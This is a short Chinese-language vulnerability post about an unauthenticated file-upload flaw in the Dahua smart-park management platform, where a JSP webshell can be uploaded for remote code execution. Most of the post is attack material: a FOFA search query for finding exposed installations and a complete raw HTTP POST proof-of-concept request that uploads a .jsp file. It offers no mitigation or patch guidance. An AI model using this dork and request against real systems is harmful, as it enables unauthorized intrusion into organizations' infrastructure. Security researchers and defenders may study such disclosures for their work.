大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞
作者:小编
更新时间:2024-10-14
点击数:
大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞,未经授权的攻击者可以上传恶意Webshell的JSP文件,可以进行RCE利用。
fofa
app="dahua-智慧园区综合管理平台"
POC内容
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT User-Agent: Java/1.8.0_345 Host: Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-Length: 229 Connection: close --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Content-Disposition: form-data; name="upload"; filename="1.jsp" Content-Type: application/octet-stream Content-Transfer-Encoding: binary 123456 --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
